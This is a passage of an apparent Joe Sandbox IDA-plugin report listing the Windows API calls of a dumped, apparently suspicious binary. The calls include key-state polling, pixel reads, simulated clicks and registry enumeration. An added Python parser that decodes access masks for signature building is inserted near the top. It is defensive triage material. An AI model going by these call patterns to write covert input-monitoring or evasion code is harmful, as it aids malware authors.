                                                                                        • API String ID: 2364364464-0
                                                                                        • Opcode ID: 6bd7c0466b0644f639bf48f31d30048c40123e654f3c44d60bf5de16a06fe63a
                                                                                        • Instruction ID: 18b91fb165d5ed72fb48f9e2da58923d019a8e6690ae14bcb20bd473d0236c33
                                                                                        • Opcode Fuzzy Hash: 6bd7c0466b0644f639bf48f31d30048c40123e654f3c44d60bf5de16a06fe63a
                                                                                        • Instruction Fuzzy Hash: FD8180716043019FD720EF28D982B6AB7E5AF89710F14896DF999DB3D2D7B0AC40CB91
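The "APIs" listings in these entries are the raw material for triage: the call sequence of a function is what a behavioural signature is built from, and the hex arguments (such as the 00000410 passed to OpenProcess above, or the 40000000 and 80000000 passed to CreateFileW in the two "nul" entries) only become readable once decoded against the Windows SDK bit masks. The parser below is an added example, not part of the Joe Sandbox report or its IDA plugin: it assumes the line shape shown in this listing (optional "Part of subcall function …:" prefix, then Api.MODULE(args), ref: address), embeds a constructed sample built from the entries above, and decodes the OpenProcess and CreateFileW access masks with the documented SDK values. The flag tables and the MODULE!Api sequence format are choices of this example, not something the report defines.

```python
import re
from typing import Dict, List, NamedTuple, Tuple

# Constructed sample input: lines copied in the shape of the Joe Sandbox
# IDA-plugin "APIs" listing, with values taken from the report entries above.
SAMPLE_LINES = """
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00B1F2F0
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 00B1F320
• GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00B1F453
• CloseHandle.KERNEL32(?), ref: 00B1F4D4
• CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00B073F6
• __swprintf.LIBCMT ref: 00B0B304
  • Part of subcall function 00AA2111: GetStockObject.GDI32(00000011), ref: 00AA2163
"""

# One listing line: optional subcall prefix, Api.MODULE, optional "(args)",
# then "ref: ADDRESS". CRT helpers such as __swprintf.LIBCMT carry no
# argument list, so the parenthesised part is optional.
LINE_RE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
HEX_RE = re.compile(r"[0-9A-Fa-f]{1,8}")  # resolved argument; "?" and "nul" are not


class ApiCall(NamedTuple):
    api: str
    module: str
    args: Tuple[str, ...]
    ref: str          # call-site address inside the dumped image
    in_subcall: bool  # True when IDA attributed the call to a callee


def parse_api_lines(text: str) -> List[ApiCall]:
    """Turn the 'APIs' bullet lines of one function entry into ApiCall records."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = tuple(a.strip() for a in raw.split(",")) if raw else ()
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             m.group("ref").upper(), m.group("sub") is not None))
    return calls


# Windows SDK bit masks for the argument positions the report prints as raw hex.
PROCESS_ACCESS = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE", 0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS", 0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION", 0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}
GENERIC_ACCESS = {
    0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
    0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL",
}
# (api name, zero-based argument index) -> flag table for that argument
FLAG_TABLES = {("OpenProcess", 0): PROCESS_ACCESS, ("CreateFileW", 1): GENERIC_ACCESS}


def decode_flags(value: int, table: Dict[int, str]) -> List[str]:
    """Split a bit mask into named flags (lowest bit first); unknown bits stay as hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    known = 0
    for bit in table:
        known |= bit
    leftover = value & ~known
    if leftover:
        names.append(hex(leftover))
    return names


def annotate(calls: List[ApiCall]) -> List[Tuple[str, List[str]]]:
    """Pair each call with decoded flag names for the arguments we know how to read."""
    out = []
    for c in calls:
        notes = []
        for i, a in enumerate(c.args):
            table = FLAG_TABLES.get((c.api, i))
            if table and HEX_RE.fullmatch(a):
                notes.append(f"arg{i}=" + "|".join(decode_flags(int(a, 16), table)))
        out.append((c.api, notes))
    return out


def api_sequence(calls: List[ApiCall]) -> List[str]:
    """Ordered MODULE!Api sequence of the function's own calls (subcall lines excluded);
    this is the string a sequence-based signature would be matched against."""
    return [f"{c.module}!{c.api}" for c in calls if not c.in_subcall]


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE_LINES)
    print(" -> ".join(api_sequence(parsed)))
    for api, notes in annotate(parsed):
        if notes:
            print(api, notes)
```

Run against the OpenProcess entry the decoder reports PROCESS_VM_READ|PROCESS_QUERY_INFORMATION, i.e. the function opens another process only to read its counters and memory statistics, not to write into it; the two CreateFileW("nul") entries decode to GENERIC_WRITE and GENERIC_READ respectively, which together with the CreatePipe/GetStdHandle calls around them is the shape of redirecting a child process's standard handles. Extending FLAG_TABLES to other argument positions (for example the share mode and creation disposition of CreateFileW) follows the same pattern.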
                                                                                        APIs
                                                                                          • Part of subcall function 00AB1A36: _memmove.LIBCMT ref: 00AB1A77
                                                                                          • Part of subcall function 00B2147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B2040D,?,?), ref: 00B21491
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B2075D
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B2079C
                                                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00B207E3
                                                                                        • RegCloseKey.ADVAPI32(?,?), ref: 00B2080F
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00B2081C
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 3440857362-0
                                                                                        • Opcode ID: 71fc5b2639df4e4aefc78b8795713cfbafd353b425deeecf50fc8aa6a22568fe
                                                                                        • Instruction ID: fc14ad127806d594bde89488067f362ffe857474cbb9f289d582a172a1f07b6b
                                                                                        • Opcode Fuzzy Hash: 71fc5b2639df4e4aefc78b8795713cfbafd353b425deeecf50fc8aa6a22568fe
                                                                                        • Instruction Fuzzy Hash: 0F515871218208AFD704EF64D991E6EB7E9FF88704F00895DF599872A2DB31E904CB52
                                                                                        APIs
                                                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00B0EC62
                                                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00B0EC8B
                                                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00B0ECCA
                                                                                          • Part of subcall function 00AA4D37: __itow.LIBCMT ref: 00AA4D62
                                                                                          • Part of subcall function 00AA4D37: __swprintf.LIBCMT ref: 00AA4DAC
                                                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00B0ECEF
                                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00B0ECF7
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 1389676194-0
                                                                                        • Opcode ID: 95d0433580a7ac5e9cebd0a78fc00949e6c65f62ec2d612bc9adf2aa94f73b98
                                                                                        • Instruction ID: a7da9e5f7c5a535bbf727ec0b2c9fbd912317bf04b484f9b1439b4a22d2c6bbc
                                                                                        • Opcode Fuzzy Hash: 95d0433580a7ac5e9cebd0a78fc00949e6c65f62ec2d612bc9adf2aa94f73b98
                                                                                        • Instruction Fuzzy Hash: 14512A35A00109DFDB05EF64CA85EAEBBF5EF49314B148499F809AB3A2CB31ED51DB50
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2e4ffbb8d0c0fa43396913549419ec3d0b1e2fce361bb43850773b74a67f250d
                                                                                        • Instruction ID: c9930dbab9298a74b4f4cb76a029f0593f4ecfbce78a7733113e6b64ee72d57b
                                                                                        • Opcode Fuzzy Hash: 2e4ffbb8d0c0fa43396913549419ec3d0b1e2fce361bb43850773b74a67f250d
                                                                                        • Instruction Fuzzy Hash: 4C41E635904224AFD710DF28EC94FA9BBF8EB09310F1501A5F81EA72F2CB70AD41DA55
                                                                                        APIs
                                                                                        • GetCursorPos.USER32(?), ref: 00AA2727
                                                                                        • ScreenToClient.USER32(00B677B0,?), ref: 00AA2744
                                                                                        • GetAsyncKeyState.USER32(00000001), ref: 00AA2769
                                                                                        • GetAsyncKeyState.USER32(00000002), ref: 00AA2777
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: AsyncState$ClientCursorScreen
                                                                                        • String ID:
                                                                                        • API String ID: 4210589936-0
                                                                                        • Opcode ID: 69ffface751298ba5701945611c316b001db52a0f5377ad0626323767db7c57f
                                                                                        • Instruction ID: 4b84c0223e2fa8729bcade4572ef2405befe4b0d651b177eeb4340732d564044
                                                                                        • Opcode Fuzzy Hash: 69ffface751298ba5701945611c316b001db52a0f5377ad0626323767db7c57f
                                                                                        • Instruction Fuzzy Hash: 35412E7550411AFBDF159F68C844AE9FB74BB06334F60835AF829972D0CB319E60DB91
                                                                                        APIs
                                                                                        • GetWindowRect.USER32(?,?), ref: 00AF95E8
                                                                                        • PostMessageW.USER32(?,00000201,00000001), ref: 00AF9692
                                                                                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00AF969A
                                                                                        • PostMessageW.USER32(?,00000202,00000000), ref: 00AF96A8
                                                                                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00AF96B0
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePostSleep$RectWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3382505437-0
                                                                                        • Opcode ID: f3b6965c66606a69af5b033f92a6df94e50ca214d8146978a3b1509893d7771b
                                                                                        • Instruction ID: 2901585ae1a24d4d17234f9dc99f3f952512d5dbcbe13facc2170532c789fa17
                                                                                        • Opcode Fuzzy Hash: f3b6965c66606a69af5b033f92a6df94e50ca214d8146978a3b1509893d7771b
                                                                                        • Instruction Fuzzy Hash: 3D319A7190021DEBDB14CFA8D94DBAE7BB5EF44315F204229FA25EB2D0C7B09924DB91
                                                                                        APIs
                                                                                        • IsWindowVisible.USER32(?), ref: 00AFBD9D
                                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00AFBDBA
                                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00AFBDF2
                                                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00AFBE18
                                                                                        • _wcsstr.LIBCMT ref: 00AFBE22
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                        • String ID:
                                                                                        • API String ID: 3902887630-0
                                                                                        • Opcode ID: fcd0a5092b90d567f19c58c3c2f648c9cc75bd982447a3f66792e6c337890229
                                                                                        • Instruction ID: db5885137d33907f32ff72e9f6031480f08d4c3a9e473f7698b24eda50ddb22e
                                                                                        • Opcode Fuzzy Hash: fcd0a5092b90d567f19c58c3c2f648c9cc75bd982447a3f66792e6c337890229
                                                                                        • Instruction Fuzzy Hash: 5621C532214208BFEB255B75DC49EBF7BBCDF45760F11802DFA09DA191EF619C5092A1
                                                                                        APIs
                                                                                          • Part of subcall function 00AA29E2: GetWindowLongW.USER32(?,000000EB), ref: 00AA29F3
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00B2B804
                                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00B2B829
                                                                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00B2B841
                                                                                        • GetSystemMetrics.USER32(00000004), ref: 00B2B86A
                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00B1155C,00000000), ref: 00B2B888
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Long$MetricsSystem
                                                                                        • String ID:
                                                                                        • API String ID: 2294984445-0
                                                                                        • Opcode ID: f7dcc17cf672c45f5dd60932b8348feb6c676c6c53a85eb5d42f739b1d663e9d
                                                                                        • Instruction ID: ce317610eceaaa2b6352241180616b6047e428496c05406db01cbd65eabf023d
                                                                                        • Opcode Fuzzy Hash: f7dcc17cf672c45f5dd60932b8348feb6c676c6c53a85eb5d42f739b1d663e9d
                                                                                        • Instruction Fuzzy Hash: 28218031924225AFCB149F39AC48E6A37E8EB05724F214778F929D72E0DF308C10DB80
                                                                                        APIs
                                                                                        • IsWindow.USER32(00000000), ref: 00B16159
                                                                                        • GetForegroundWindow.USER32 ref: 00B16170
                                                                                        • GetDC.USER32(00000000), ref: 00B161AC
                                                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 00B161B8
                                                                                        • ReleaseDC.USER32(00000000,00000003), ref: 00B161F3
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ForegroundPixelRelease
                                                                                        • String ID:
                                                                                        • API String ID: 4156661090-0
                                                                                        • Opcode ID: a002ecc8f711160aa0ccb9bb5db72849b3878683c7dbb9fcd7574ba719a6071f
                                                                                        • Instruction ID: d5bc45e10eda528090d2cc98ca197f35ffd714985e819d3b8a0b105bdc581862
                                                                                        • Opcode Fuzzy Hash: a002ecc8f711160aa0ccb9bb5db72849b3878683c7dbb9fcd7574ba719a6071f
                                                                                        • Instruction Fuzzy Hash: F121C375A00204AFD714EF65DD89A9EBBF9EF88310F1484A9F94A97352CF30AD50CB90
                                                                                        APIs
                                                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00AA1729
                                                                                        • SelectObject.GDI32(?,00000000), ref: 00AA1738
                                                                                        • BeginPath.GDI32(?), ref: 00AA174F
                                                                                        • SelectObject.GDI32(?,00000000), ref: 00AA1778
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ObjectSelect$BeginCreatePath
                                                                                        • String ID:
                                                                                        • API String ID: 3225163088-0
                                                                                        • Opcode ID: bc7a0f1faad38e1ba726bdcfa343c825feaee07a8f7d4c7ae6de932e1e495ece
                                                                                        • Instruction ID: 236232d2b729373b339a903e14fe470e07559f28e9562ed39cb91700fa8fa34e
                                                                                        • Opcode Fuzzy Hash: bc7a0f1faad38e1ba726bdcfa343c825feaee07a8f7d4c7ae6de932e1e495ece
                                                                                        • Instruction Fuzzy Hash: F8215C30954208FBDB10DF2ADD48B6D7BA9EB41329F24422AF815972E0DFB59D91CF90
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memcmp
                                                                                        • String ID:
                                                                                        • API String ID: 2931989736-0
                                                                                        • Opcode ID: 0f1568c57a27f0f08d7268de1ace12c75b3a1429a9a60957b1ec4cfd17daf584
                                                                                        • Instruction ID: 25874d9a9eb562d30c1163a085e4304db7439f3166ece9b41ecf5d48eca85618
                                                                                        • Opcode Fuzzy Hash: 0f1568c57a27f0f08d7268de1ace12c75b3a1429a9a60957b1ec4cfd17daf584
                                                                                        • Instruction Fuzzy Hash: D1019272B0020D7BE21466529F82FBB73ACDE61BE4F144029FF0697642F761DE1592E0
                                                                                        APIs
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00B05075
                                                                                        • __beginthreadex.LIBCMT ref: 00B05093
                                                                                        • MessageBoxW.USER32(?,?,?,?), ref: 00B050A8
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00B050BE
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00B050C5
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                        • String ID:
                                                                                        • API String ID: 3824534824-0
                                                                                        • Opcode ID: f20cae70d2308791b4d9fb86bc39bb3c74bb0ac7d9ede032c0a400d3b910c74d
                                                                                        • Instruction ID: 8d7aeaae0f76be741103ecdba623ca106e8e7b593710a950a954aec71e9ea72a
                                                                                        • Opcode Fuzzy Hash: f20cae70d2308791b4d9fb86bc39bb3c74bb0ac7d9ede032c0a400d3b910c74d
                                                                                        • Instruction Fuzzy Hash: E2110872908708BBC7119BA89C18A9F7FACEB45324F24029AF814D33D0DEB589008BF0
                                                                                        APIs
                                                                                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AF8E3C
                                                                                        • GetLastError.KERNEL32(?,00AF8900,?,?,?), ref: 00AF8E46
                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00AF8900,?,?,?), ref: 00AF8E55
                                                                                        • HeapAlloc.KERNEL32(00000000,?,00AF8900,?,?,?), ref: 00AF8E5C
                                                                                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AF8E73
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                        • String ID:
                                                                                        • API String ID: 842720411-0
                                                                                        • Opcode ID: 38364f2b67b51a08fbf3699cbc37115d2f10bcb7ce790e2c0d2aa9db7a8e20e4
                                                                                        • Instruction ID: b954b90d5c7d9adf3a324ea5bc55027e122337d89e6fae98e25b4a3fa1ffbafc
                                                                                        • Opcode Fuzzy Hash: 38364f2b67b51a08fbf3699cbc37115d2f10bcb7ce790e2c0d2aa9db7a8e20e4
                                                                                        • Instruction Fuzzy Hash: 4E014B74210208AFDB205FE6DC59D6F7BADEF89754B200569F949C3260DF31DC10CA60
                                                                                        APIs
                                                                                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B0581B
                                                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00B05829
                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B05831
                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00B0583B
                                                                                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B05877
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                        • String ID:
                                                                                        • API String ID: 2833360925-0
                                                                                        • Opcode ID: ee935568bb4a4c52d5a473f1f6b85901433485b807c79c35529a2d51d9f93a8e
